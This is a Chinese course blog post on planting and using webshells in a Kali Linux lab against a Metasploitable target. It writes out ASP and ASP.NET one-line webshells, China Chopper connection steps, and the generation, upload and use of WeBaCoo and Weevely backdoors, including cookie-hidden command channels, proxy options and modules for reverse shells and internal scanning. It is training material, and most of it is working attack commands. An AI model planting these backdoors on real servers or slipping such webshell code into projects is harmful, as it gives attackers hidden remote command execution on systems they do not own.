Kali Linux渗透测试 102 利用工具-Webshell

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. Webshell 演示
2. 中国菜刀的使用
3. http1010101321php
4. 输入密码pass
5. WeBaCoo Web Backdoor Cookie
6. Weevely

1. Webshell 演示


  1. 在被攻击者新建 webshell 文件

    root@metasploitable:/var/www# cat test.php 
    
    
  2. 攻击者调用 webshell

    http://10.10.10.132/test.php?cmd=id
    

2. 中国菜刀的使用


  1. 一句话木马

    PHP:    
    ASP:    <%eval request("pass")%>
    ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
    

  2. 复制 PHP 的一句话木马到服务器

    root@metasploitable:/var/www# cat 1.php 
    
    
  3. 菜刀连接

    • 添加URL

    • 添加 shell

      http://10.10.10.132/1.php

      输入密码:pass

    • 双击打开 URL


    • 虚拟终端( www-data权限 )


3. WeBaCoo (Web Backdoor Cookie)


  1. 简介

    • 类终端的shell,只针对 PHP
    • 编码通信内容通过 cookie 头传输,隐蔽性较强
    • Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
    • cm:bash64 编码之后的命令
    • cn:服务器用于返回数据的 cookie 头的名
    • cp:返回信息定界符
  2. 生成服务器端

    • webacoo -g -o webacoo.php

       -g        Generate backdoor code (-o is required)
       -o        OUTPUT Generated backdoor output filename
      

      root@kali:~# scp webacoo.php [email protected]:/tmp
      

      Kali Linux渗透测试 102 利用工具-Webshell_第1张图片

  3. 客户端端连接

    • webacoo -t -u http://10.10.10.132/webacoo.php

      -t        Establish remote "terminal" connection (-u is required)
      -u        URL    Backdoor URL
      

      Kali Linux渗透测试 102 利用工具-Webshell_第2张图片

  4. 通过 cookie 进行传输,抓包分析

    • 抓包

      Kali Linux渗透测试 102 利用工具-Webshell_第3张图片

      Kali Linux渗透测试 102 利用工具-Webshell_第4张图片

    • 解码查看

      Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
      root@kali:~# echo aWQ= | base64 -d
      id
      
  5. 其他参数

    Options:
      -g        Generate backdoor code (-o is required)
    
      -f FUNCTION   PHP System function to use
        FUNCTION
            1: system   (default)
            2: shell_exec
            3: exec
            4: passthru
            5: popen
    
      -o OUTPUT Generated backdoor output filename
    
      -r        Return un-obfuscated backdoor code
    
      -t        Establish remote "terminal" connection (-u is required)
    
      -u URL    Backdoor URL
    
      -e CMD    Single command execution mode (-t and -u are required)
    
      -m METHOD HTTP method to be used (default is GET)
    
      -c C_NAME Cookie name (default: "M-cookie")
    
      -d DELIM  Delimiter (default: New random for each request)
    
      -a AGENT  HTTP header user-agent (default exist)
    
      -p PROXY  Use proxy (tor, ip:port or user:pass:ip:port)
    
      -v LEVEL  Verbose level
        LEVEL
            0: no additional info (default)
            1: print HTTP headers
            2: print HTTP headers + data
    
      -l LOG    Log activity to file
    
      -h        Display help and exit
    
      update    Check for updates and apply if any
    

4. Weevely


  1. 简介

    • 隐蔽的终端 PHP Webshell,只针对 PHP
    • 30 多个管理模块

      • 执行系统命令
      • 检查服务器常见配置错误
      • 创建正向、反向 TCP Shell 连接
      • 通过目标计算机代理iHTTP 流量
      • 从目标计算机运行端口扫描,渗透内网
    • 支持连接密码

  2. Kali 缺少库

    • https://pypi.python.org/pypi/PySocks/
    • ./setup.py install
  3. 生成服务器端

    • weevely generate password path
    • 默认路径在 /usr/share/weevely/

      root@kali:~# weevely generate 123456 weevely.php
      root@kali:/usr/share/weevely# cat weevely.php 
      

      Kali Linux渗透测试 102 利用工具-Webshell_第5张图片

    • 上传到 靶机

      root@kali:/usr/share/weevely# scp weevely.php [email protected]:/var/www
      
  4. 客户端连接服务器

    • weevely URL password cmd

      root@kali:~# weevely http://10.10.10.132/weevely.php 123456
      

      Kali Linux渗透测试 102 利用工具-Webshell_第6张图片

  5. 抓包分析

    • 抓包

      Kali Linux渗透测试 102 利用工具-Webshell_第7张图片
      Kali Linux渗透测试 102 利用工具-Webshell_第8张图片

  6. 连上靶机之后,可以使用 help 命令查看所有模块

    [email protected]:/var/www $ help
    [email protected]:/var/www $ audit_suidsgid /
    [email protected]:/var/www $ audit_filesystem
    

    Kali Linux渗透测试 102 利用工具-Webshell_第9张图片

    Kali Linux渗透测试 102 利用工具-Webshell_第10张图片

你可能感兴趣的:(kali-linux)